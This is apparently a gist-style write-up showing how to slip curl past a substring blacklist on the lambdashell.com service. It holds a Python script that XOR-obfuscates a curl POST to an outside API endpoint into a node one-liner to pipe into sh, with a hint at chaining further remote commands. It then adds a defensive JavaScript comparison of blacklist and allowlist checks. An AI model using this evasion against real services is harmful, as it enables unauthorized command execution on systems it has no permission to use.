http://www.lambdashell.com/ uses `command.includes('curl')` to blacklist curl; such a substring check can be bypassed by piping the output of this script into sh.
```python
from random import choices, seed
from sys import argv

# The command that should end up being executed; it never appears literally in the output.
payload = b'''curl -v -X POST -H 'Content-Type: application/json' -d '{command: "echo \\"place here another CURL to a server that will return a newly encoded cmd to tie the knot\\""}' https://yypnj3yzaa.execute-api.us-west-1.amazonaws.com/dev'''

seed(argv[1])  # first CLI argument seeds the PRNG, so the same seed reproduces the same key
obfuscation_key = choices(range(256), k=len(payload))  # one random byte per payload byte
obfuscated_payload = [x ^ y for x, y in zip(payload, obfuscation_key)]  # XOR each payload byte with its key byte

# Emit a node one-liner that undoes the XOR at runtime and prints the original command.
print(f"node -e 'console.log(String.fromCharCode(...{obfuscated_payload}.map((x,i)=>x^{obfuscation_key}[i])))'")  # Could be obfuscated further by adding random spacing, using with something like http://www.jsfuck.com/ etc.
```
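The defensive side of the same issue, as an added example that is not code from the gist or from lambdashell.com: the substring blacklist next to an allowlist check that does not depend on recognising every spelling or encoding of a binary name. The blocked words, the allowed program names and the sample commands are assumptions for the demo.

```javascript
// Added example, not the gist's or lambdashell.com's own code.
// Assumed blacklist and allowlist contents for the demonstration.
const BLOCKED_SUBSTRINGS = ['curl', 'wget'];

// Weak check: rejects only commands whose text literally contains a blocked word.
// A wrapper that rebuilds the real command at runtime (node -e, printf | sh, ...)
// never contains the word and therefore passes.
function blacklistAllows(command) {
  return !BLOCKED_SUBSTRINGS.some((word) => command.includes(word));
}

// Stronger check: the first token must be an explicitly allowed program, and the
// line may not contain shell metacharacters, so no pipe, interpreter or second
// command can be smuggled in regardless of how its text is encoded.
const ALLOWED_PROGRAMS = new Set(['ls', 'cat', 'whoami', 'pwd']);
const SHELL_META = /[;&|`$<>(){}\\\n"']/;

function allowlistAllows(command) {
  if (SHELL_META.test(command)) return false;
  const argv = command.trim().split(/\s+/);
  return argv.length > 0 && ALLOWED_PROGRAMS.has(argv[0]);
}

// Constructed sample inputs: a harmless listing, a direct curl, and a wrapper that
// decodes its real command at runtime (the technique the gist uses) and pipes it to sh.
const SAMPLES = {
  listing: 'ls -la /tmp',
  directCurl: 'curl -s http://example.invalid/',
  wrapper: "node -e 'console.log(String.fromCharCode(...[99,117,114,108]))' | sh",
};

// Run both checks over every sample and return the verdicts side by side.
function compareChecks() {
  const result = {};
  for (const [name, cmd] of Object.entries(SAMPLES)) {
    result[name] = { blacklist: blacklistAllows(cmd), allowlist: allowlistAllows(cmd) };
  }
  return result;
}

console.log(compareChecks());
```

The blacklist lets the wrapper through while rejecting only the literal `curl`; the allowlist rejects both and still accepts the plain listing.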